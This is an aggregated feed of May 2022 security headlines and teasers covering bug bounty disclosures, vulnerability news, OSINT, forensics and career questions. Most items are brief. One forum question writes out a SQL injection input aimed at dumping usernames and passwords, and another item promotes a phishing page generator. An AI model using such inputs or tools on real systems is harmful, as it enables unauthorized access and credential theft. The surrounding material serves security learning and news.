    SQLI — Intro to Databases
    Before we learn about SQL injections, we need to learn more about databases and Structured Query Language (SQL), which databases will… Continue reading on Medium »
  • Open

    Stealing Google Drive OAuth tokens from Dropbox
    submitted by /u/staz0t [link] [comments]
    We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere
    submitted by /u/mgalloar [link] [comments]
    In hot pursuit of ‘cryware’: Defending hot wallets from attacks
    submitted by /u/SCI_Rusher [link] [comments]
    Hacking Swagger-UI - from XSS to account takeovers
    submitted by /u/albinowax [link] [comments]
    EMBA v1.0 - Black Hat Singapore Edt. - Version 1.0 of the firmware security analyzer EMBA is released
    submitted by /u/_m-1-k-3_ [link] [comments]
  • Open

    What information can we obtain from an email address?
    OSINT techniques Continue reading on Medium »
    War in Ukraine / May 16
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    The General Theory for Open Source Intelligence in brief (A proposal)
    With the proposal of a “General Theory” for Open Source Intelligence (GT/OSINT) we attempt to formulate an innovative process for the… Continue reading on Medium »
  • Open

    Nighthawk 0.2 - Catch Us If you Can - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-05-17 Review
    The three cores, four elements and one key question of intelligence by ourren. For more recent articles, visit SecWiki
  • Open

    Integer overflow vulnerability
    Glovo disclosed a bug submitted by 0f1c3r: https://hackerone.com/reports/1562515
    [app.lemlist.com] Improper handling of payment lead to bypass payment
    lemlist disclosed a bug submitted by omarelfarsaoui: https://hackerone.com/reports/1420697
  • Open

    Emotet Summary: November 2021 Through January 2022
    We review recent activity from the Emotet malware family, covering changes in Emotet operations since its revival in November 2021. The post Emotet Summary: November 2021 Through January 2022 appeared first on Unit42.
  • Open

    Law enforcement forensics career transition
    I am currently a digital forensics analyst for law enforcement. I want to transition into cyber/info security but I am having a hard time understanding what jobs I could apply for. My experience doesn’t really align with much. I’ve been looking at infosec analyst roles. Law enforcement is dead box forensics. All home computing devices, and we know exactly what we’re looking for. Never do malware analysis and networking stuff. I’ve studied all the domains with sec+ but haven’t actually paid to sit the exam because I’d rather a company fund it. Any advice? submitted by /u/gofigured21 [link] [comments]
    Analyzing Page File for Malware
    Hello everyone, I was analyzing a page file for malware. I ran strings to extract the strings from it, and found lots of suspicious strings. I then started looking at the strings on my own host PC for a comparison. Upon examining my host's pagefile I found some strings that are suspicious, but nowhere near the amount in comparison to the system I'm examining, and Windows Defender won't allow me to open the text file in Notepad due to a potential virus. I've scanned both pagefile outputs with Malwarebytes and got no hits on them, but when scanning with Windows Defender I get multiple hits for various CVEs and Trojans. So my question is: is this normal when examining pagefiles? I was thinking that it could be something extracted from Windows Defender in the pagefile? submitted by /u/NoImaginationForThis [link] [comments]
  • Open

    Bypassing WAF to Weaponize a Stored XSS
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 3)
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 2)
    No content preview
    What is SSH and How to use it? | With Examples
    No content preview
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    No content preview
    This is how my Windows 10 Hacked! and how i overcome it (Remove a Trojan-Horse from affected PC).
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
    No content preview
  • Open

    linear algebra notes
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Analysis and reproduction of the Rari Capital attack
    Author: w2ning. This article is a reader submission; Seebug Paper welcomes your contributions, and every accepted submission receives a gift. Submission email: paper@seebug.org. Preliminary ramblings: on April 30, several of Rari Capital's lending pools suffered a flash-loan reentrancy attack, losing roughly 80 million USD. The underlying vulnerability is similar to the fourth Cream hack I analyzed last year, but the attack method is more elegant, hence this article. Root cause: the bad precedent set by Compound. Veteran DeFi...
    Summary of three malicious price-manipulation attacks
    Author: w2ning. This article is a reader submission; Seebug Paper welcomes your contributions, and every accepted submission receives a gift. Submission email: paper@seebug.org. Preliminary ramblings: what follows is a combined analysis of three independent attacks from the first half of 2022. Although the vulnerabilities differ, they share one trait: the attackers no longer rely only on flash loans for a Single-Transaction-Attack (my own made-up term), but put down real money to the tune of several...
  • Open

    FreeBuf Morning Report | UK draws up a nuclear cybersecurity strategy; US manufacturing giant attacked by Conti
    US manufacturing giant attacked by Conti.
    Zheng Tongzhou of the 360 Advanced Offense and Defense Lab: "know the white, keep to the black", forging the shield in the mind with the spear in the hand
    Cybersecurity needs attack-and-defense exercises: use that sharp spear to find the weak points in the shield. "Knowing the white and keeping to the black", Zheng Tongzhou and the 360 Advanced Offense and Defense Lab are ready, waiting only for the wind to rise.
    Apple issues emergency update for a zero-day used to break into Macs and Watches
    Apple recently released security updates to address a new zero-day vulnerability that attackers can exploit to attack Mac and Apple Watch devices.
    iPhone exposed to a new attack surface: malware can run even when the phone is turned off
    An attacker could tamper with the firmware and load malware onto the Bluetooth chip, which keeps executing while the iPhone is "off".
    Liufangyun (六方云) Security Situation Weekly, Issue 199
    Industry developments at a glance, security incidents in full view.
    Ukrainian hacker sentenced to four years for selling stolen credentials on the dark web
    A 28-year-old Ukrainian was sentenced to 4 years in prison for selling login credentials on the dark web.
    HTML attachments are still popular in phishing attacks
    According to research covering the first quarter of 2022, HTML files remain one of the most popular attachment types in phishing attacks.
    With HW (the national attack-and-defense exercise) imminent, how is the forgotten physical security doing?
    Top-tier hackers often use only the most rudimentary attack methods.
    FreeBuf Morning Report | Several Italian government websites paralyzed by DDoS attacks; Apple urgently fixes a zero-day
    Apple has released security updates to address a zero-day vulnerability that threat actors could exploit to attack Mac and Apple Watch devices.
  • Open

    Modern Technology Exploits and Analysis
    Continue reading on Medium »

  • Open

    [case study#1] IDOR vulnerability allows access to user’s personal data
    What is IDOR? Continue reading on Medium »
    The Bucket’s Got a Hole in it
    Introduction Continue reading on Medium »
    Bug Bounty from Meta Pool
    Meta Pool has published a Bug Bounty program in its GitBook, in which anyone who discovers a bug or vulnerability in… can participate. Continue reading on Meta Pool Russia »
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is Core Rule Set & why it is utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with… Continue reading on InfoSec Write-ups »
    Bounty Hacker Walkthrough — Try Hack Me
    You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove… Continue reading on System Weakness »
  • Open

    Malcolm v6 released on GitHub, now including Suricata and more new protocol parsers
    submitted by /u/mmguero [link] [comments]
    F5 BIG-IP critical vulnerability exploited by attackers to gain unauthenticated RCE
    submitted by /u/sciencestudent99 [link] [comments]
    Shielder - Printing Fake Fiscal Receipts - An Italian Job p.2
    submitted by /u/smaury [link] [comments]
    From Project File to Code Execution: Exploiting XINJE PLC Program Tool
    submitted by /u/derp6996 [link] [comments]
    SMM Callouts in HP Products
    submitted by /u/lightgrains [link] [comments]
    GitHub - gabriel-sztejnworcel/pipe-intercept: Intercept Windows Named Pipes communication using Burp or similar HTTP proxy tools
    submitted by /u/gabrielszt [link] [comments]
    Technical Advisory – Bluetooth Low Energy Proximity Authentication Vulnerable to Relay Attacks
    submitted by /u/digicat [link] [comments]
  • Open

    Computer image analysis - online trials
    There was a website where you could download a computer image and you would answer questions about the image to finish the challenge (who last logged on?, etc.) and I can't seem to find it again. Does something like that still exist? submitted by /u/hamsterbilly [link] [comments]
    Password protected RAR file!
    I have a password protected RAR file on one of my servers; it was found in the system folder. I am not considering it malware because its size is 90MB+, but I do want to know what's inside it! Brute force doesn't seem like a good idea, so what other options do I have? Looking for help and guidance from the good people of computer forensics!! submitted by /u/Supra02 [link] [comments]
  • Open

    Privilege Escalation on TikTok for Business
    TikTok disclosed a bug submitted by naaash: https://hackerone.com/reports/1505567 - Bounty: $2500
    Site information's Display Name section vulnerable for XSS attacks and HTML Injections.
    Automattic disclosed a bug submitted by sawrav-chowdhury: https://hackerone.com/reports/1554888 - Bounty: $150
    Security misconfiguration
    lemlist disclosed a bug submitted by mr23r0: https://hackerone.com/reports/1486327
    CVE-2022-27781: CERTINFO never-ending busy-loop
    curl disclosed a bug submitted by sybr: https://hackerone.com/reports/1555441
    HTTP Request Smuggling in Transform Rules using hexadecimal escape sequences in the concat() function
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1478633 - Bounty: $6000
  • Open

    Check the public GitHub repositories for CVE vulnerabilities
    Article URL: https://memgraph.com/blog/graph-data-zagreb-summary-april-2022 Comments URL: https://news.ycombinator.com/item?id=31402433 Points: 1 # Comments: 0
  • Open

    An OS tool for storing, searching, and displaying news wires
    An OSINT way to read, analyse, and compare news outlets which use Telegram. Continue reading on Medium »
    War in Ukraine / May 14–15
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    OSINT: Do I have to Capture The Flag? Pt2.
    Making a persona that’s even faker than your social media identity. Continue reading on Medium »
  • Open

    Putting the team in red team
    One of the more common questions we receive during a red team scoping call or RFP Q&A call is, how many dedicated consultants will be involved in the assessment? There is no “correct” answer to this question, and ultimately, the answer as to how red team engagements are staffed comes down to how the consultancy... The post Putting the team in red team appeared first on TrustedSec.
  • Open

    Block calendy.com spam
    All, is there a good way to block someone trying to spam us using calendy.com without simply blocking everything from calendy.com? Situation: We have some folks who are getting hammered by someone sending constant Calendy event invites. I'm guessing it's some sort of bot as there are several different gmail addresses as the other invitee. submitted by /u/twrolsto [link] [comments]
    What jobs to look for after Vulnerability Analyst / Management?
    I want to start getting the needed requirements and experience for a position after this, but I'm not sure what job title I would be searching for, or what comes next in the chain of jobs. I would like to go to a more red-team focused role, but honestly, my main aim is a better salary submitted by /u/Dependent-Context-43 [link] [comments]
    How do you make writing reports more pleasant? [Penetration tests]
    Hi, I've been writing reports for a while now but I'm struggling big time. Our methodology is pretty complicated and I want to automate it. We write the vulnerabilities in Markdown, render with pandoc into a Word file, then take it and merge it with the Word template. Then we validate, make corrections and export it to PDF. The good part is that we don't have to fix styles when writing it, but I'm sure there must be a better way to do it. I've researched a few options but can't find a good one. I'm thinking about creating a web app with a DB containing all the vulnerabilities that were used in the reports, so it will be easier to import them. Some of them, for example missing headers, will only have an option to import an image with the proof of concept, with previously prepared static text containing the information. In other vulnerabilities that need additional writing there will be placeholders. Somehow I think my idea will take way too long; any ideas or tips will be highly appreciated. PS: I've noticed that taking trashy notes additionally slows down my reporting process. Can you suggest editors like OneNote (including images) that can be used on both Windows and Linux? Thanks! submitted by /u/tryingtoworkatm [link] [comments]
    Sysmon on Linux
    Hi everyone, what is your take on installing Sysmon on Linux hosts in terms of volume and benefit, and is there any configuration file equivalent to SwiftOnSecurity's for Windows? Your detailed information is highly appreciated. submitted by /u/azizalmarfadi [link] [comments]
    Security consultant interview tips
    I have a graduate security consultant interview next week and would like a few tips on how to impress the interviewer (they are a senior member of the company). I really want this role as I want to push myself this year. Many thanks! submitted by /u/Appreciatingthegoods [link] [comments]
  • Open

    API Security Offence and Defence: Introduction to API
    submitted by /u/cybersocdm [link] [comments]
    I'm new to binary exploitation and my interest lie in security for IOT devices. I need suggestions on what I should learn
    I already know I should learn C and read the Shellcoder's Handbook; I know some CTFs but I don't know if they're good for IoT. What I aim for is to not waste any effort learning unnecessary info and, most importantly, to start off with something really basic and easy. Can you guys suggest where to begin, which CTFs I should tackle, what path I should take and finally what I should avoid (a crude example: people interested in binary exploitation of PCs should learn about x86 instead of wasting time on MIPS or ARM)? submitted by /u/winter-stalk [link] [comments]
  • Open

    SecWiki News 2022-05-16 Review
    Cybersecurity startups from 0 to 1: speech transcript by ourren; Rethinking "cyberspace has no borders" in light of the Russia-Ukraine conflict by ourren; Viewing the Russia-Ukraine war situation through cyberspace mapping, and its lessons for us by ourren; SecWiki Weekly (Issue 428) by ourren; (Translation) How to put SLSA into practice by ourren; MySQL security configuration baseline by SecIN Community; Flaws in the DNSAML service of some endpoint security products by Avenger. For more recent articles, visit SecWiki
  • Open

    UK government sits out bug bounty boom but welcomes vulnerability disclosure
    Article URL: https://portswigger.net/daily-swig/uk-government-sits-out-bug-bounty-boom-but-welcomes-vulnerability-disclosure Comments URL: https://news.ycombinator.com/item?id=31398182 Points: 2 # Comments: 0
  • Open

    Gin and Juice Shop: put your scanner to the test
    "Word". We heard that a lot of you have been having problems finding a truly dope vulnerable web application to wave your scanner at. As makers of the web's OG vulnerability scanner, we couldn't be le
  • Open

    A Look Into Public Clouds From the Ransomware Actor's Perspective
    Ransomware in public clouds is rare, but cloud threat actors could adapt their TTPs to be more cloud native. Now is the time to get ahead of it. The post A Look Into Public Clouds From the Ransomware Actor's Perspective appeared first on Unit42.
  • Open

    Module-1 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    No content preview
  • Open

    2022 recruitment notice for the China Automotive Data information security team
    China Automotive Data Co., Ltd. is recruiting three engineers.
    How to address endpoint ransomware threats from a security-business perspective | FreeBuf customer-side community livestream recap
    On May 12, Li Zonghui, security architect at an enterprise, was the keynote speaker at the third internal livestream of the FreeBuf customer-side community, sharing how to address endpoint ransomware threats from a security-business perspective.
    Hackers are exploiting a critical vulnerability in Zyxel firewalls and VPNs
    The vulnerability affects enterprise Zyxel firewall and VPN devices.
    Pro-Russian hackers attack Italian government websites
    A pro-Russian hacker group called "Killnet" launched attacks on the websites of several Italian institutions, including the Senate, the National Institute of Health and the national automobile association.
    Lianjia IT administrator who deleted a database sentenced to 7 years in prison
    A Lianjia employee was sentenced to 7 years in prison for logging into the company's systems and deleting company data.
    SonicWall: patch the SMA 1000 vulnerabilities immediately
    SonicWall notes that attackers could exploit these vulnerabilities to bypass authorization and potentially compromise vulnerable devices.
    Linux Internal Network Penetration (Part 3): Linux Privilege Escalation
    This article is the second in the Linux internal network penetration series: Linux privilege escalation.
    New Sysrv botnet variant attacks Windows and Linux servers
    A new variant of the Sysrv botnet, Sysrv-K, is exploiting vulnerabilities in the Spring Framework and WordPress to deploy cryptocurrency-mining malware on vulnerable Windows and Linux servers.
  • Open

    Viewing the Russia-Ukraine war situation through cyberspace mapping, and its lessons for us
    Author: Yang Jilong. WeChat public account: 神龙叫. Original link: https://mp.weixin.qq.com/s/HLvydDDhTfxK-xWsGEuCpA. By analyzing Russian and Ukrainian internet-space mapping data from before and after the outbreak of the war, one can get a partial picture of the physical war between Russia and Ukraine and a more detailed look at the confrontation in cyberspace. 1. In the early stage of the war, Russia's cyberspace defense was at a disadvantage. Cyberspace mapping shows that over the past year the number of exposed open ports on Russian internet IPs was 86.09 million, versus 516... for Ukraine
  • Open

    RedTeam Physical Tools
    Red Team Toolkit — A curated list of tools that are commonly used in the field for Physical Security, Red Teaming, and Tactical Covert… Continue reading on Medium »

  • Open

    Zphisher — Phishing Generator
    Zphisher is a tool that generates fake pages with the aim of harvesting usernames and passwords. Continue reading on 100security »
    Why I love using NMAP
    Whether you’re in the information security industry, have played Capture The Flag competitions, or maybe you’re just someone who likes cyber… Continue reading on Medium »
    Best YouTube Channels for Learning Cyber Security
    Best YouTube Channels for learning Cyber Security- Continue reading on Medium »
    Bug bounties, The glamour.
    Hello to the readers, it’s been a while since I wrote on Medium and this morning I feel like writing something after analysing… Continue reading on Medium »
    Why enumerate folders and files - A valuable, simple technique
    The enumeration technique is used to reconnoitre the target environment and obtain information about files or folders that exist on a web… Continue reading on Medium »
  • Open

    X — the Pornographic Gorefest That is Neither
    A lesser A24 has much to offer in theme and thesis, but it’s got no meat on the bones. Continue reading on The Movie Chaser »
  • Open

    Using Stolen IAM Credentials - Hacking The Cloud
    submitted by /u/RedTermSession [link] [comments]
    MITM_Intercept: A little less hackish way to intercept and modify non-HTTP protocols through Burp & others.
    submitted by /u/jat0369 [link] [comments]
  • Open

    us military…..like everything
    Yes it’s not quite an OD….BUT!…. Yes it’s interesting af And I felt like I would be Sinning if I didn’t share this. https://www.militarynewbie.com/military-manuals/ submitted by /u/Salty_Ad_69 [link] [comments]
    Anybody got all of Black Clover on gdrive?
    submitted by /u/Left_Command_9458 [link] [comments]
  • Open

    Internet devices in country domain
    How to search for specific IOT devices or firewalls, filtered by country domain, region or locality? It occurs to me that I could extract information from SSL certificates, or things like that. Has anyone made a similar script that could be useful to me? submitted by /u/N0xFE [link] [comments]
    OpenVPN help
    Hello all I have an IT Security interview in the next few weeks for a graduate role and I will have to use OpenVPN to access applications. I’ve never done this before so how can I prepare for this? Thank you everyone submitted by /u/Appreciatingthegoods [link] [comments]
    OTP brute force in Zap
    So I am trying to do a lab on portswigger. But the payload that I want to give is not working as it starts from 999 and goes till 9999. So it is essentially missing the 0xxx type of OTPs. How to achieve this?? submitted by /u/Full_Albatross_5636 [link] [comments]
    Securing family network
    My parents used a very weak password for both our wifi and control panel, so obviously I changed those. I also disabled UPnP as it seems that's another point of vulnerability. What else can I do to tighten up security? submitted by /u/Able-Board-503 [link] [comments]
  • Open

    SQLI-Introduction
    Most modern web applications utilize a database structure on the back-end. Such databases are used to store and retrieve data related to… Continue reading on Medium »
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 3)
    In the previous article details regarding syntax, variables, and their usage was conveyed. This Final Part Will be about the Installation… Continue reading on InfoSec Write-ups »
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
    Hey everyone, I hope you all are doing well. I have been Programming in multiple languages for some time now, so I thought Writing Bash… Continue reading on InfoSec Write-ups »
    How I managed to take over any account visits my profile with Stored XSS
    Hello everybody, today we have a simple Stored XSS vulnerability that leads to stealing cookies and Taking over the account. Let’s start Continue reading on Medium »
    The Bug Hunter's Book: a roadmap to becoming a security bug hunter
    It is said, "Do what you love, and you will never feel like you are working again"… One of the well-known pieces of advice for excelling at your work, having fun and making money at the same time is to do what you love;… Continue reading on Medium »
    How to find vulnerable websites to SQL-Injection vulnerability in real life
    In this writeup you will learn how real hackers find vulnerable websites to SQL-Injection vulnerability to perform this web application… Continue reading on Medium »
  • Open

    Computer Forensics Tools | Kroll Artifact Parser and Extractor | TryHackMe KAPE
    submitted by /u/MotasemHa [link] [comments]
    GIAC GCFE QUESTIONS
    Are the workbooks (exercises) necessary to index? submitted by /u/ScruffyBlackFables [link] [comments]
    Does law enforcement always use digital forensics for devices or drives seized as evidence?
    See title. submitted by /u/bmiller8675 [link] [comments]
  • Open

    SecWiki News 2022-05-15 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    How businesses can benefit from open-source intelligence techniques
    Use of OSINT in business Continue reading on Medium »
    SPY NEWS: 2022 — Week 19
    Summary of the espionage-related news stories for the Week 19 (8–14 May) of 2022. Continue reading on Medium »
  • Open

    [sqli-lab tutorial] less-1
    Sharing the sqli-lab tutorial for study.
    DedeCMS (织梦) backend audit
    The DedeCMS backend allows uploading files directly, or uploading zip files.
  • Open

    Origin IP found, WAF Cloudflare Bypass
    SMTP2GO BBP disclosed a bug submitted by mrrobot2050: https://hackerone.com/reports/1536299 - Bounty: $100

  • Open

    "Zero-Days" Without Incident - Compromising Angular via Expired npm Publisher Email Domains
    submitted by /u/mandatoryprogrammer [link] [comments]
    Three ways to hack an ATM
    submitted by /u/DiabloHorn [link] [comments]
    Exploiting a Use-After-Free for code execution in every version of Python 3
    submitted by /u/DOTheLOGA [link] [comments]
    Reverse engineering Flutter apps
    submitted by /u/lmpact_ [link] [comments]
  • Open

    Best way to capture RAM from an Android device ?
    Research based so not worried about being forensically sound. I’ve tried LiME but couldn’t get the compile to work. submitted by /u/Flxtcha [link] [comments]
    View jpg files using linux sleuth kit
    Made a similar post a few days back but wasn't very clear with my question, so I will give it one more try. I have a school exercise where we are using Sleuth Kit in Kali to find information about a USB image that we created using dd. Now in this exercise there is a question saying, "what does picture19.jpg represent?" So basically I have to type a command that opens up the picture and shows it to me, but I don't know which one. I have the inode number, so I tried icat -o but it's just giving me lots of text as output. So what command should I be using instead to view a jpg picture, for example? Hope it was clearer this time! Thanks! submitted by /u/ahmedmourad22 [link] [comments]
  • Open

    War in Ukraine / May 13
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    Navigate through but have a look at the Tarot directory!!
    http://80.56.13.139/arc/Miscellaneous/Alternative%20religions%20and%20beliefs/Tarot/ submitted by /u/Appropriate-You-6065 [link] [comments]
    Moldova's ProTV news reports
    u/ODCrawler https://pl.uniflor.biz/ProTV/ Contains several .mp4 with news reports from ProTV in Chisinau, Moldova. submitted by /u/vjandrea [link] [comments]
    Official Hewlett Packard Drivers for Printers
    submitted by /u/Mr_Brightstar [link] [comments]
    British Canoeing
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Domain Persistence: Silver Ticket Attack
    Introduction: Benjamin Delpy (the creator of mimikatz) introduced the silver ticket attack at Black Hat 2014 in his session on abusing Kerberos. Silver tickets are forged service The post Domain Persistence: Silver Ticket Attack appeared first on Hacking Articles.
  • Open

    Credential leak on redirect
    curl disclosed a bug submitted by iylz: https://hackerone.com/reports/1568175
    Disclose STUFF member name and make actions.
    Shopify disclosed a bug submitted by zambo: https://hackerone.com/reports/968174 - Bounty: $500
    Disclose customer orders details by shopify chat application.
    Shopify disclosed a bug submitted by zambo: https://hackerone.com/reports/968165 - Bounty: $2500
    Public Postman Api Collection Leaks Internal access to https://assets-paris-dev.codefi.network/
    Consensys disclosed a bug submitted by polem4rch: https://hackerone.com/reports/1523651 - Bounty: $500
    Download full backup [Mtn.co.rw]
    MTN Group disclosed a bug submitted by ibrahimatix0x01: https://hackerone.com/reports/1516520
  • Open

    Red Teaming
    Red Teaming is a simulation of a real attacker’s activity that is based on the most up-to-date knowledge regarding risks that are relevant… Continue reading on Medium »
    Cybersecurity Skill
    Cybersecurity Red Team vs. Blue Team: Key Differences Explained Continue reading on Medium »
    SearchMap Information Collection Tool
    Searchmap is a comprehensive information collection tool for pre-penetration testing that integrates domain name resolution, IP reverse… Continue reading on Medium »
  • Open

    Easy to find vulnerabilities that might get paid [part-1]
    Hello everyone, it's me Sankalpa Baral, a noob hacker from Nepal. Hope you all are doing great stuff. I am back after a long time, so today I… Continue reading on Medium »
    My New Discovery In Oracle E-Business Login Panel That Allowed To Access For All Employees…
    Hey Hunters, Hello Infosec Community Continue reading on Medium »
    Does MS15-034 still exist today?
    Hi everyone, how are you? I hope you guys are well. I'm RyuuKhagetsu; this is my article in English, sorry if there are any mistakes. I… Continue reading on Medium »
  • Open

    SecWiki News 2022-05-14 Review
    CVE-2022-21907 HTTP Protocol Remote Code Execution Vulnerability Analysis Summary by ourren; CVE-2021-34535 RDP Client Vulnerability Analysis by ourren; Front-end JS Attack and Defense by ourren. For more of the latest articles, visit SecWiki
  • Open

    X (2022) Review: Opposition and Proximity
    Ti West has a great deal of tact with horror; his works do not start from a very unrecognizable place and always show something peculiar about the… Continue reading on Medium »
  • Open

    How universal is LogRhythm?
    Basically I’m just starting to look into wanting to be a soc analyst. I am getting my sec + rn, work a basic lvl it job trying to get a bit of exp under my belt and have an associates in IT but am planning on going back to get my ba (I’m only 22). I’ve been reading a lot of Reddit posts from here and career questions when I’m bored and I’ve been seeing a lot of things talking about trying to practice LogRhythm. Is it important to practice it for every soc job or does every company use different programs. I ask because it seems super interesting and if it can give me a boost in the field, I’d hop right on learning about it. This could be a very dumb question but I’m still relatively new so cut me some slack lol submitted by /u/Spirtedgems [link] [comments]
    Incidents to look out for in http log files
    As part of a university assignment I've been given the task of analysing some log files with Splunk to find any incidents on the organisation's network. What should I be looking out for? How can I tell if there's a potential attack on the system, such as phishing or malware? submitted by /u/fgtethancx [link] [comments]
    Threat Intelligence at your org
    I have to write a plan for our organization to do threat intelligence. It's for compliance, but we should really start doing something. At the moment, we're looking at a system to automatically gather file hashes, IPs, etc. and put them in our firewalls and other devices. We're also looking at a once-a-month briefing to our C-suite. What are you doing? submitted by /u/Odd-Kale2587 [link] [comments]
  • Open

    Zyxel silently patches command-injection vulnerability with 9.8 severity rating
    Article URL: https://arstechnica.com/information-technology/2022/05/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating/ Comments URL: https://news.ycombinator.com/item?id=31376372 Points: 5 # Comments: 0
  • Open

    Summary and Reflections on Building a DevSecOps System at Large Internet Companies
    In recent years, with the frequent occurrence of software supply chain attacks and data security incidents, enterprises face major software supply chain security and data leakage risks, which has indirectly driven … Continue reading Summary and Reflections on Building a DevSecOps System at Large Internet Companies →
    A Few Notes on Cloud Attack and Defense (continued)
    The author actually shared some ideas on the cloud attack and defense series publicly a few years ago; those interested can read Red Teaming for Cloud … Continue reading A Few Notes on Cloud Attack and Defense (continued) →

  • Open

    Hacking: The Art Of Exploitation
    When studying from this book, am I supposed to learn how every code sample works from scratch or only copy paste it and learn about its purpose and functions from the author? So far I've been rewriting every sample from scratch and making sure I'm understanding it, but at the same time I'm moving too slow and was wondering if that's even the correct approach. submitted by /u/Majestic_Ideal9833 [link] [comments]
  • Open

    Is there any alternative/competitor to DBprotect?
    I'm not a Trustwave fan BUT that product is excellent at what it does. I'm wondering if there is an alternative to it. I know IBM has Guardium, and I've used it and it is complete garbage. Plus it's really made for constant DB monitoring, not pen-test-style testing/auditing like DBProtect is. submitted by /u/networkalchemy [link] [comments]
    What is the best password manager for me?
    I was talking to a friend regarding password security and they sort of explained password managers. I of course knew they existed, but didn't know there were different kinds. According to my friend, they were roughly divided into three: manual backup, cloud backup and internet sync. My question would be which kind (and which one specifically) would be best suited for me? I live in a city that is insecure and journalists and researchers are constantly targeted. I am afraid I could get either caught by law enforcement (not because what I do is illegal per se, but authority abuse is rife here) or hacked by someone and have my data erased. What would you recommend for someone in my situation? submitted by /u/marypine [link] [comments]
    Is drozer still relevant for mobile pentest?
    Does anyone still use drozer for mobile pentests nowadays? I've just checked its GitHub page https://github.com/FSecureLABS/drozer and found that development has been stopped: "We would like to formally announce that F-Secure has stopped further development of the drozer tool." I tried the Docker image and am having a connection refused issue, not sure what is going on. submitted by /u/w0lfcat [link] [comments]
    Bad Experiences Working With BitSight?
    Does anyone have any negative BitSight experiences to share from dealing with them at their companies? I'll go first; their paid service is worthless, their "findings" are filled with false positives, and you have to divert resources to get the score up for underwriter optics, which has nothing to do with improving your actual security posture. I really don't know how they're allowed to legally operate, it's extortion. submitted by /u/Memerkitty [link] [comments]
    tricky python code
    Hi, why does this script show "All our secrets!!! 😨 😩 😱" 2 times??? What confuses me is why passing a False value gave us the same message???

    ```python
    class User:
        """system user"""

        def __init__(self, trusted=False):
            self.trusted = trusted

        def can_login(self):
            """only lets trusted friends read secrets"""
            return self.trusted


    def login(user):
        """Gives access to users with privileges."""
        if user.can_login:
            print("All our secrets!!! 😨 😩 😱")
        else:
            print("No secrets for you!")


    hacker = User(trusted=False)
    friend = User(trusted=True)
    login(hacker)
    login(friend)
    ```

    submitted by /u/Spare_Prize1148 [link] [comments]
    Hi, code injection help please
    Hi, I'm typing 1' or ‘1’=’1 in the search box when trying to find all the persons, usernames and passwords in the database. But I get the following error message: "There was error in your query: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1". The server version is Apache/2.4.41 (Ubuntu) and I found that it is version MariaDB-5.5.41. How can I find the right syntax? Thanks submitted by /u/Traditional_Bird_877 [link] [comments]
  • Open

    Understanding Data Sources and File Formats
    Following on the heels of my previous post regarding file formats and sharing the link to the post on LinkedIn, I had some additional thoughts that would benefit greatly from not blasting those thoughts out as comments to the original post, but instead editing and refining them via this medium. My first thought was, is it necessary for every analyst to have deep, intimate knowledge of file formats? The answer to that is a resounding "no", because it's simply not possible, and not scalable. There are too many possible file formats for analysts to be familiar with; however, if a few knowledgeable analysts, ones who understand the value of the file format information to DFIR, CTI, etc., document the information and are available to act as resources, then that should suffice. With the format a…
  • Open

    error parse uri path in curl
    curl disclosed a bug submitted by iylz: https://hackerone.com/reports/1566462
    Memory leak in CURLOPT_XOAUTH2_BEARER
    curl disclosed a bug submitted by pappacoda: https://hackerone.com/reports/1567257
    Cookie injection from non-secure context
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1560324
    [Java] CWE-016: Query to detect insecure configuration of Spring Boot Actuator
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1137966 - Bounty: $500
    [CPP]: Add query for CWE-754: Improper Check for Unusual or Exceptional Conditions when using functions scanf
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1549073 - Bounty: $1800
    [Java]: CWE-552 Add sources and sinks to detect unsafe getResource calls in Java EE applications
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1564099 - Bounty: $1800
    [CPP]: Add query for CWE-190: Integer Overflow or Wraparound when using transform after operation
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1564100 - Bounty: $500
    [Java]: CWE-321 - Query to detect hardcoded JWT secret keys
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1567588 - Bounty: $1800
  • Open

    Docker Containers Security Series
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Tom & Jelly - Google Drive video's movie
    submitted by /u/damschreeuwer [link] [comments]
    OtherPeople - Google Drive
    submitted by /u/damschreeuwer [link] [comments]
  • Open

    PowerShell Scripts used to run malicious shellcode. Reverse Shell vs Bind Shell
    submitted by /u/CyberMasterV [link] [comments]
    Hunting evasive vulnerabilities
    submitted by /u/0xdea [link] [comments]
  • Open

    War in Ukraine / May 12
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    A Chasing Scene From Tenet — An OSINT Geo Location Challenge
    Where’s the car? Continue reading on Medium »
    Cool OSINT tools you can use to gather information about a target
    Today I will go over some basic OSINT tools you should know about if you want to gather information about a target. So let’s get started! Continue reading on System Weakness »
